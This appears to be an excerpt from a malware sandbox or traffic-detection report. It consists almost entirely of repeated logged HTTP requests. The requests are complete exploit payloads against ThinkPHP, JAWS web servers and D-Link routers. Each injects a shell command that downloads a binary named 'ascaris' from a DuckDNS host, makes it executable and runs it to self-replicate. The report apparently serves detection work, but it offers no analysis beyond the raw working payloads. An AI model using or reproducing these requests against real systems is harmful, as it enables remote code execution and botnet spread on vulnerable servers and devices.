            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
